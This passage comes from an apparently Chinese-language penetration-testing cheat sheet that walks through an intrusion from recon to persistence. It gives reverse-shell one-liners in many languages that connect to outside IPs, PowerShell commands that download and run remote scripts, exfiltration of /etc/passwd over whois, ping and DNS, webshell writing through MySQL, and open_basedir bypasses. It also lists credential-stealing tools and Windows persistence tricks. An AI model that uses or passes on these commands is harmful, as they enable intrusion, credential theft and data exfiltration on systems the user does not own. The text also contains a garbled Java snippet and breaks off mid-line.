Applocker](#bypass-applocker) * [bypassAV](#bypassav) * [痕迹清理](#痕迹清理) * [<a href="https://3gstudent.github.io/3gstudent.github.io/渗透技巧-Windows日志的删除与绕过/" rel="nofollow">Windows日志清除</a>](#windows日志清除) * [破坏Windows日志记录功能](#破坏windows日志记录功能) * [msf](#msf) * [3389登陆记录清除](#3389登陆记录清除) ## 信息搜集 ### 开源情报信息收集(OSINT) #### github * Github_Nuggests(自动爬取Github上文件敏感信息泄露) :https://github.com/az0ne/Github_Nuggests * GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) :https://github.com/FeeiCN/GSIL * x-patrol(小米团队的):https://github.com/MiSecurity/x-patrol #### whois查询/注册人反查/邮箱反查/相关资产 * 站长之家:http://whois.chinaz.com/?DomainName=target.com&ws= * 爱站:https://whois.aizhan.com/target.com/ * 微步在线:https://x.threatbook.cn/ * IP反查:https://dns.aizhan.com/ * 天眼查:https://www.tianyancha.com/ * 虎妈查:http://www.whomx.com/ * 历史漏洞查询 : * 在线查询:http://wy.zone.ci/ * 自搭建:https://github.com/hanc00l/wooyun_publi/ #### google hacking ### 创建企业密码字典 #### 字典列表 * passwordlist:https://github.com/lavalamp-/password-lists * 猪猪侠字典:https://pan.baidu.com/s/1dFJyedz [Blasting_dictionary](https://github.com/rootphantomer/Blasting_dictionary)(分享和收集各种字典,包括弱口令,常用密码,目录爆破。数据库爆破,编辑器爆破,后台爆破等) * 针对特定的厂商,重点构造厂商相关域名的字典 ``` ['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!'] ``` #### 密码生成 * GenpAss(中国特色的弱口令生成器: https://github.com/RicterZ/genpAss/ * passmaker(可以自定义规则的密码字典生成器) :https://github.com/bit4woo/passmaker * pydictor(强大的密码生成器) :https://github.com/LandGrey/pydictor * 白鹿社工字典生成器:https://github.com/HongLuDianXue/BaiLu-SED-Tool #### 邮箱列表获取 * theHarvester :https://github.com/laramies/theHarvester * 获取一个邮箱以后导出通讯录 * LinkedInt :https://github.com/mdsecactivebreach/LinkedInt * Mailget:https://github.com/Ridter/Mailget #### 泄露密码查询 * ghostproject: https://ghostproject.fr/ * pwndb: https://pwndb2am4tzkvold.onion.to/ #### 加密密码破解 * pwcrack-framework(自动猜测可能的加密方式并破解): https://github.com/L-codes/pwcrack-framework #### 对企业外部相关信息进行搜集 ##### 子域名获取 * Layer子域名挖掘机4.2纪念版 * subDomainsBrute :https://github.com/lijiejie/subDomainsBrute * wydomain :https://github.com/ring04h/wydomain * Sublist3r :https://github.com/aboul3la/Sublist3r * site:target.com:https://www.google.com * Github代码仓库 * 抓包分析请求返回值(跳转/文件上传/app/api接口等) * 站长帮手links等在线查询网站 * 域传送漏洞 * OneForAll : https://github.com/shmilylty/OneForAll Linux ``` dig @ns.example.com example=.com AXFR ``` Windows ``` nslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器 nslookup #进入nslookup交互模式 server dns.domian.com #指定dns服务器 ls xxx.yyy.cn #列出域信息 ``` * GetDomainsBySSL.py :https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/ * censys.io证书 :https://censys.io/certificates?q=target.com * crt.sh证书查询:https://crt.sh/?q=%25.target.com * shadon :https://www.shodan.io/ * zoomeye :https://www.zoomeye.org/ * fofa :https://fofa.so/ * censys:https://censys.io/ * dnsdb.io :https://dnsdb.io/zh-cn/search?q=target.com * api.hackertarget.com :http://api.hackertarget.com/reversedns/?q=target.com * community.riskiq.com :https://community.riskiq.com/Search/target.com * subdomain3 :https://github.com/yanxiu0614/subdomain3 * FuzzDomain :https://github.com/Chora10/FuzzDomain * dnsdumpster.com :https://dnsdumpster.com/ * phpinfo.me :https://phpinfo.me/domain/ * dns开放数据接口 :https://dns.bufferover.run/dns?q=baidu.com * pipl.com :https://pipl.com/ * Source Code Search Engine :https://publicwww.com/ * Hunter lets you find email addresses in seconds and connect with the people that matter for your business :https://hunter.io/ * searchcode :https://searchcode.com/ * greynoise :https://greynoise.io/ ## 外网穿透 ### 绕过open_basedir 1. ini_set绕过 ``` mkdir('img'); chdir('img'); ini_set('open_basedir','..'); chdir('..'); chdir('..'); chdir('..'); chdir('..'); chdir('..'); chdir('..'); chdir('..'); ini_set('open_basedir','/'); ``` 2. 系统命令执行绕过; system("cd /;ls") 3. glob://伪协议绕过 ``` <?php // 循环 ext/spl/examples/ 目录里所有 *.php 文件 // 并打印文件名和文件尺寸 $it = new DirectoryIterator("glob://ext/spl/examples/*.php"); foreach($it as $f) { printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024); } ?> <?php $a = new DirectoryIterator("glob:///*"); foreach($a as $f){ echo($f->__toString().'<br>'); } ?> <?php var_dump(scandir('glob:///*')); > <?php if ( $b = opendir('glob:///*') ) { while ( ($file = readdir($b)) !== false ) { echo $file."<br>"; } closedir($b); } ?> ``` 4. symlink函数绕过 symlink()对于已有的target建立一个名为link的符号连接。 ``` 读取/etc/passwd <?php mkdir("a"); chdir("a"); mkdir("b"); chdir("b"); mkdir("c"); chdir("c"); mkdir("d"); chdir("d"); chdir(".."); chdir(".."); chdir(".."); chdir(".."); symlink("a/b/c/d","Von"); symlink("Von/../../../../etc/passwd","exp"); unlink("Von"); mkdir("Von"); system('cat exp'); ``` 5. 还有一些鸡肋的[办法](https://www.v0n.top/2020/07/10/open_basedir%E7%BB%95%E8%BF%87/) ### 绕过disable_function 1. 蚁剑插件 2. https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&mid=2247485666&idx=1&sn=71a0cce05637edd488cb9cccb3967504 直接把php脚本传上去,然后传参就可以执行命令,不过是无回显的,这样弹回的shell有时是一次性的,连上执行不了命令,解决办法是用stowaway 参考:https://blog.z3ratu1.cn/%E4%BB%8EByteCTF%E5%88%B0bypass_disable_function.html ​ https://www.cnblogs.com/sakura521/p/15055907.html ### Mysql 拿shell ``` 写文件 show global variables like '%secure_file_priv%'; select '<?php phpinfo(); ?>' into outfile '/var/www/html/info.php'; sqlmap -u "http://x.x.x.x/?id=x" --file-write="/Users/guang/Desktop/shell.php" --file-dest="/var/www/html/test/shell.php" 日志拿shell SHOW VARIABLES LIKE 'general%'; # 更改日志文件位置 set global general_log = "ON"; set global general_log_file='/var/www/html/info.php'; select '<?php phpinfo();?>'; 知道用户名多次密码错误有几率登陆 for i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 -P3306 ; done UDF提权 动态库下载:https://sqlsec.lanzoux.com/i4b7jhyhwid 查看插件目录 show variables like '%plugin%'; select @@basedir; 没有的话创建: select 233 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation'; 写入动态链接库 sqlmap -u "http://localhost:30008/" --data="id=1" --file-write="/Users/sec/Desktop/lib_mysqludf_sys_64.so" --file-dest="/usr/lib/mysql/plugin/udf.so" 创建函数 CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; select * from mysql.func; select sys_eval('whoami'); drop function sys_eval; ``` [t00ls UDF.PHP](https://github.com/echohun/tools/blob/master/大马/udf.php) 网页脚本,一键UDF [参考](https://www.sqlsec.com/2020/11/mysql.html#toc-heading-31) ### 域前置 * [Domain Fronting ](https://evi1cg.me/archives/Domain_Fronting.html) * [Tor_Fronting.](https://evi1cg.me/archives/Tor_Fronting.html) ### 代理搭建 * VPN * shadowsockts :https://github.com/shadowsocks * HTTP :http://cn-proxy.com/ * Tor * [Venom](https://github.com/Dliv3/Venom) -- 但是不支持UDP流量 * [Stowaway](https://github.com/ph4ntonn/Stowaway) -- 支持UDP流量,稳定性好 ``` admin: ./stowaway_admin -l 9999 agent: ./stowaway_agent -c 127.0.0.1:9999 --reconnect 10 ``` * [nps](https://github.com/ehang-io/nps) * [frp](https://github.com/fatedier/frp) ``` VPS配置: [common] bind_addr = 0.0.0.0 bind_port = 7000 token = test #port,token自定义 保持客户端与服务端一致即可 web界面 # dashboard_addr = 0.0.0.0 # 端口必须设置,只有设置web页面才生效 dashboard_port = 7500 # 用户密码 dashboard_user = admin1 dashboard_pwd = hadaessd@@@!!@@# # 允许客户端绑定的端口 allow_ports = 40000-50000 启动服务端: nohup ./frps -c frps.ini & 目标机上配置: #编辑frpc.ini内容如下,与frpc一并上传到服务器 # chmod +x frpc(最好将其改个名,比如deamon) [common] server_addr = xxx.xxx.xx.xxx # port,token保持一致 server_port = 7000 token = test tls_enable = true pool_count = 5 #http协议代理 [plugin_http_proxy] type = tcp remote_port = 7890 plugin = http_proxy # 可以添加认证 # plugin_http_user = abc # plugin_http_passwd = abc #socks5协议代理 [plugin_socks5] type = tcp remote_port = 7891 plugin = socks5 # plugin_user = abc # plugin_passwd = abc use_encryption = true use_compression = true ``` - [frpModify](https://github.com/uknowsec/frpModify) -> 修改之后支持域前置以及自删除 * proxychain `proxychain4 -q bash #终端全局代理` * Neo-reGeorg : https://github.com/L-codes/Neo-reGeorg ``` python3 neoreg.py -k password -u http://xx/tunnel.php ``` - [chisel](https://github.com/jpillora/chisel)--文章介绍[《Red Team: Using SharpChisel to exfil internal network》](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) - [SharpChisel](https://github.com/shantanu561993/SharpChisel)--chisel的c#封装版本 - [mssqlproxy](https://github.com/blackarrowsec/mssqlproxy)--利用mssql执行clr作为传输通道(当目标机器只开放mssql时) - [ligolo](https://github.com/FunnyWolf/ligolo) -- 轻量级的反向Socks5代理工具,所有的流量使用TLS加密 * [NC端口转发](https://blog.csdn.net/l_f0rm4t3d/article/details/24004555) * [LCX端口转发 ](http://blog.chinaunix.net/uid-53401-id-4407931.html) * [nps](https://github.com/cnlh/nps) -> 个人用觉得比较稳定 ~ * [Tunna ](https://github.com/SECFORCE/Tunna) * [Reduh ](https://github.com/sensepost/reDuh) * [pystinger](https://github.com/FunnyWolf/pystinger) -> 毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射. * [EW](https://rootkiter.com/EarthWorm/) 正向 SOCKS v5 服务器: ``` ./ew -s ssocksd -l 1080 ``` 反弹 SOCKS v5 服务器: a) 先在一台具有公网 ip 的主机A上运行以下命令: ``` $ ./ew -s rcsocks -l 1080 -e 8888 ``` b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口 ``` $ ./ew -s rssocks -d 1.1.1.1 -e 8888 ``` 多级级联 ``` $ ./ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 ``` lcx_tran 的用法 ``` $ ./ew -s ssocksd -l 9999 $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 ``` lcx_listen. lcx_slave 的用法 ``` $ ./ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 ``` “三级级联”的本地SOCKS测试用例以供参考 ``` $ ./ew -s rcsocks -l 1080 -e 8888 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 $ ./ew -s lcx_listen -l 9999 -e 7777 $ ./ew -s rssocks -d 127.0.0.1 -e 7777 ``` - [Termite](https://rootkiter.com/Termite/) 使用说明:https://rootkiter.com/Termite/README.txt ### shell反弹 bash ``` bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ``` perl ``` perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` python ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` php ``` php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ruby ``` ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` java ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] 创维A20 String[]) p.waitFor() ``` nc ``` #使用-e nc -e /bin/sh 223.8.200.234 1234 ``` ``` #不使用-e mknod /tmp/backpipe p /bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe ``` lua ``` lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` stcp协议反弹shell ``` # https://github.com/srat1999/sctp-shell # server sudo ./scp-shell -s -lp 443 -a 192.168.0.189 # client ./scp-shell -a 192.168.0.189 -lp 56738 -rp 443 ``` 利用powershell反弹全交互式shell ``` # server stty raw -echo; (stty size; cat) | nc -lvnp 3001 # client IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001 ``` ### 内网文件的传输和下载 wput ``` wput dir_name ftp://linuxpig:123456@host.com/ ``` wget ``` wget http://site.com/1.rar -O 1.rar ``` ariac2(需安装) ``` aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2 ``` powershell ``` $p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file","C:%homepath%file") ``` 回传文件 ``` php起服务: php -S 0.0.0.0:8888 <?php $file = date("Hism"); file_put_contents($file, file_get_contents("php://input")); powershell回传:powershell iwr ip:8888/upload.php -method POST -infile C:\xx\xx\xx.zip ``` 下载文件 ``` powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://95.163.202.147:8000/vendor.jsp', 'a.jsp') ``` 下载并执行 ``` powershell IEX (New-Object System.Net.Webclient).DownloadString('http://95.163.202.147:8000/ooo.ps1') ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); ``` vbs脚本 ``` Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:\%homepath%\file", 2 ' end with ``` >执行 :cscript test.vbs Perl ``` #!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file"); ``` >执行:perl test.pl Python ``` #!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close() ``` >执行:python test.py Ruby ``` #!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } } ``` >执行:ruby test.rb PHP ``` <?php $url = 'http://www.example.com/file'; $path = '/path/to/file'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($path, $data); ?> ``` >执行:php test.php NC attacker ``` cat file | nc -l 1234 ``` target ``` nc host_ip 1234 > file ``` FTP ``` ftp 127.0.0.1 username password get file exit ``` TFTP ``` tftp -i host GET C:%homepath%file location_of_file_on_tftp_server ``` Bitsadmin ``` bitsadmin /transfer n http://domain/file c:%homepath%file ``` Window 文件共享 ``` net use x: \127.0.0.1\share /user:example.comuserID myPassword ``` SCP 本地到远程 ``` scp file user@host.com:/tmp ``` 远程到本地 ``` scp user@host.com:/tmp file ``` rsync 远程rsync服务器中拷贝文件到本地机 ``` rsync -av root@192.168.78.192::www /databack ``` 本地机器拷贝文件到远程rsync服务器 ``` rsync -av /databack root@192.168.78.192::www ``` certutil.exe ``` certutil.exe -urlcache -split -f http://site.com/file ``` copy ``` copy \\IP\ShareName\file.exe file.exe ``` WHOIS 接收端 Host B: ``` nc -vlnp 1337 | sed "s/ //g" | base64 -d ``` 发送端 Host A: ``` whois -h host_ip -p 1337 `cat /etc/passwd | base64` ``` [WHOIS + TAR](https://twitter.com/mubix/status/1102780436118409216) First: ``` ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it ``` Next ``` tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits ``` Finally ``` cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out ``` PING 发送端: ``` xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done ``` 接收端`ping_receiver.py`: ``` import sys try: from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") sys.exit(0) def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 8: data = pkt[ICMP].load[-4:] print(f'{data.decode("utf-8")}', flush=True, end="", sep="") sniff(iface="eth0", prn=process_packet) ``` ``` python3 ping_receiver.py ``` DIG 发送端: ``` xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done ``` 接收端`dns_reciver.py`: ``` try: from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") def process_packet(pkt): if pkt.haslayer(DNS): domain = pkt[DNS][DNSQR].qname.decode('utf-8') root_domain = domain.split('.')[1] if root_domain.startswith('gooogle'): print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='') sniff(iface="eth0", prn=process_packet) ``` ``` python3 dns_reciver.py ``` [Upload-Go-Fileserver](https://github.com/OlivierLaflamme/Upload-Go-Fileserver) ``` go run fileserver.go -port 4040 -pass password -user username ``` ... ### 搭建 HTTP server python2 ``` python -m SimpleHTTPServer 1337 ``` python3 ``` python -m http.server 1337 ``` PHP 5.4+ ``` php -S 0.0.0.0:1337 ``` ruby ``` ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start' ``` ``` ruby -run -e httpd . -p 1337 ``` Perl ``` perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start' ``` ``` perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })' ``` busybox httpd ``` busybox httpd -f -p 8000 ``` pwndrop -- 一款十分好用的投放漏洞载荷的工具 ``` # https://github.com/kgretzky/pwndrop ``` Swego -- golang实现的文件上传下载服务器 ``` # https://github.com/nodauf/Swego ./webserver ``` SimpleHTTPserver -- golang实现 ``` # https://github.com/projectdiscovery/simplehttpserver simplehttpserver ``` ## 内网信息搜集 ### 本机信息搜集 #### 1. 用户列表 windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户 #### 2. 进程列表 析杀毒软件/安全监控工具等 邮件客户端 VPN ftp等 #### 3. 服务列表 与安全防范工具有关服务[判断是否可以手动开关等] 存在问题的服务[权限/漏洞] #### 4. 端口列表 开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集 #### 5. 补丁列表 分析 Windows 补丁 第三方软件[Java/Oracle/Flash 等]漏洞 #### 6. 本机共享 本机共享列表/访问权限 本机访问的域共享/访问权限 #### 7. 本用户习惯分析 历史记录 收藏夹 文档等 #### 8. 获取当前用户密码工具 ##### Windows * [mimikatz](https://github.com/gentilkiwi/mimikatz) * [wce](https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64) * [Invoke-WCMDump](https://github.com/peewpw/Invoke-WCMDump) * [mimiDbg](https://github.com/giMini/mimiDbg) * [LaZagne](https://github.com/AlessandroZ/LaZagne) * [nirsoft_package](http://launcher.nirsoft.net/downloads/) * [QuarksPwDump](https://github.com/quarkslab/quarkspwdump) [fgdump](https://github.com/mcandre/fgdump) * 星号查看器 * [浏览器密码--HackBrowserData](https://github.com/moonD4rk/HackBrowserData) * [浏览器密码--BrowserGhost](https://github.com/QAX-A-Team/BrowserGhost) * [浏览器密码--SharpChromium](https://github.com/djhohnstein/SharpChromium) * [浏览器密码--chromepass](https://github.com/darkarp/chromepass) -- 获取并解密 Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi 保存的cookie和密码 * [GetPwd](https://github.com/sf197/GetPwd) -- 获取 Navicat、TeamView、Xshell、SecureCRT产品的密码 * [FireFox-Thief](https://github.com/LimerBoy/FireFox-Thief) -- passwords, cookies, history, bookmarks * [Adamantium-Thief](https://github.com/LimerBoy/Adamantium-Thief) -- passwords, credit cards, history, cookies, bookmarks, autofill * [goLazagne](https://github.com/kerbyj/goLazagne) -- Browsers[Chromium-based;Mozilla Firefox;Internet Explorer and Edge]/Mail[Thunderbird ; [TBD] Outlook]/Windows[Credential Manager]/SysAdmin tools[Mobaxterm;Putty;Filezilla;Openssh]/WiFi passwords ##### Linux * [LaZagne](https://github.com/AlessandroZ/LaZagne) * [mimipenguin](https://github.com/huntergregal/mimipenguin) ### 扩散信息收集 #### 端口扫描 ##### 常用端口扫描工具 * [nmap](https://nmap.org/) * [masscan](https://github.com/robertdavidgraham/masscan) * [zmap](https://github.com/zmap/zmap) * s扫描器 * 自写脚本等 * NC * Routerscan * SScan2.exe * [Perun](https://github.com/WyAtu/Perun) -- 可以打包为exe上传到目标进行扫描 * [AssetScan](https://github.com/JE2Se/AssetScan) -- 集成了弱口令检测 * [ServerScan](https://github.com/Adminisme/ServerScan) -- 可以联动CS3.14中的[CrossC2](https://github.com/gloxec/CrossC2)项目进行跨平台扫描 * [netscan](https://github.com/jessfraz/netscan) -- Go语言写的网段端口扫描器 * [fscan](https://github.com/shadow1ng/fscan) * ... ##### 网卡信息扫描(开放135端口) * [Ladon](https://github.com/k8gege/Ladon) #### 内网拓扑架构分析 * DMZ * 管理网 * 生产网 * 测试网 #### 常见信息收集命令 ipconfig: ``` ipconfig /all ------> 查询本机 IP 段,所在域等 ``` net: ``` net user ------> 本机用户列表 net localgroup administrators ------> 本机管理员[通常含有域用户] net user /domain ------> 查询域用户 net group /domain ------> 查询域里面的工作组 net group "domain admins" /domain ------> 查询域管理员用户组 net localgroup administrators /domain ------> 登录本机的域管理员 net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 net group "domain controllers" -------> 查看域控制器(如果有多台) net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表 net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多 net view /domain:domainname net view \\dc 查看dc域内共享文件 net time /domain net config workstation 当前登录域 - 计算机名 - 用户名 net use \\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机,可访问资源 ``` dsquery ``` dsquery computer domainroot -limit 65535 && net group "domain computers" /domain ------> 列出该域内所有机器名 dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名 dsquery subnet ------>列出该域内网段划分 dsquery group && net group /domain ------>列出该域内分组 dsquery ou ------>列出该域内组织单位 dsquery server && net time /domain------>列出该域内域控制器 ``` query ``` query user || qwinsta------>查看当前在线用户 ``` tasklist ``` tasklist /svc tasklist /S ip /U domain\username /P /V 查看远程计算机tasklist ``` ### 第三方信息收集 * NETBIOS 信息收集 * SMB 信息收集 * 空会话信息收集 * 漏洞信息收集等 * 自建DNS服务器来获取内网域名对应的IP信息 参考项目:[DNS SOCKS Proxy](https://github.com/jtripper/dns-tcp-socks-proxy) 修改完配置文件之后使用如下命令就可以对内网域名进行查询:`dig @部署此项目电脑的IP地址 -p 配置文件中指定的端口 A +short 内网域名` * 主机关键文件以及文件内容信息查询 参考项目:[SharpSearch](https://github.com/djhohnstein/SharpSearch) ## 权限提升 ### Windows #### BypassUAC ##### 常用方法 * 使用IFileOperation COM接口 * 使用Wusa.exe的extract选项 * 远程注入SHELLCODE 到傀儡进程 > [C_Shot](https://github.com/anthemtotheego/C_Shot)--下载,注入,在内存中执行shellcode * DLL劫持,劫持系统的DLL文件 * eventvwr.exe and registry hijacking * sdclt.exe * SilentCleanup * wscript.exe * cmstp.exe * 修改环境变量,劫持高权限.Net程序 * 修改注册表HKCU\Software\Classes\CLSID,劫持高权限程序 * 直接提权过UAC ##### 常用工具 * [UACME ](https://github.com/hfiref0x/UACME) * [Bypass-UAC ](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC) * [Yamabiko ](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko) * ... #### Bypass AMSI ##### 常用工具 * [AmsiScanBufferBypass](https://github.com/rasta-mouse/AmsiScanBufferBypass) * [NetLoader--将二进制程序加载进内存运行,从而在运行时patching AMSI并且 bypassing Windows Defender](https://github.com/Flangvik/NetLoader) #### 提权 * windows内核漏洞提权 >检测类:[Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester),[WinSystemHelper](https://github.com/brianwrf/WinSystemHelper),[wesng](https://github.com/bitsadmin/wesng) >利用类:[windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits),[BeRoot](https://github.com/AlessandroZ/BeRoot.git) * 服务提权 >数据库服务,ftp服务,打印机等 >工具(具有一个服务账号之后进行提权):[Juicy Potato](https://github.com/ohpe/juicy-potato) > Windows Spooler Vulnerability that allows an elevation of privilege on Windows 7 and later -- [CVE-2020-1337](https://github.com/neofito/CVE-2020-1337) * WINDOWS错误系统配置 * 系统服务的错误权限配置漏洞 * 不安全的注册表权限配置 * 不安全的文件/文件夹权限配置 * 计划任务 * 任意用户以NT AUTHORITY\SYSTEM权限安装msi * 提权脚本 >[PowerUP](https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1),[ElevateKit](https://github.com/rsmudge/ElevateKit),[Sherlock](https://github.com/rasta-mouse/Sherlock) ### Linux #### 内核溢出提权 [linux-kernel-exploits ](https://github.com/SecWiki/linux-kernel-exploits) #### 计划任务 ``` crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root ``` #### SUID ``` find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; ``` #### 系统服务的错误权限配置漏洞 ``` cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg ``` #### 不安全的文件/文件夹权限配置 ``` cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history ``` #### 找存储的明文用户名,密码 ``` grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla ``` ## 权限维持 ### 系统后门 #### Windows ##### 1. 密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器 安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。 NTPass 获取管理员口令,一般用 gina 方式来,但有些机器上安装了 pcanywhere 等软件,会导致远程登录的时候出现故障,本软件可实现无障碍截取口令。 Linux 下 openssh 后门 重新编译运行的sshd服务,用于记录用户的登陆密码。 ##### 2. 常用的存储Payload位置 **WMI** : 存储: ``` $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null) $StaticClass.Name = 'Win32_Command' $StaticClass.Put() $StaticClass.Properties.Add('Command' , $Payload) $StaticClass.Put() ``` 读取: ``` $Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value ``` **包含数字签名的PE文件** 利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名 **特殊ADS** … ``` type putty.exe > ...:putty.exe wmic process call create c:\test\ads\...:putty.exe ``` 特殊COM文件 ``` type putty.exe > \\.\C:\test\ads\COM1:putty.exe wmic process call create \\.\C:\test\ads\COM1:putty.exe ``` 磁盘根目录 ``` type putty.exe >C:\:putty.exe wmic process call create C:\:putty.exe ``` ##### 3. Run/RunOnce Keys 用户级 ``` HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ``` 管理员 ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ``` ##### 4. BootExecute Key 由于smss.exe在Windows子系统加载之前启动,因此会调用配置子系统来加载当前的配置单元,具体注册表键值为: ``` HKLM\SYSTEM\CurrentControlSet\Control\hivelist HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager ``` ##### 5. Userinit Key WinLogon进程加载的login scripts,具体键值: ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 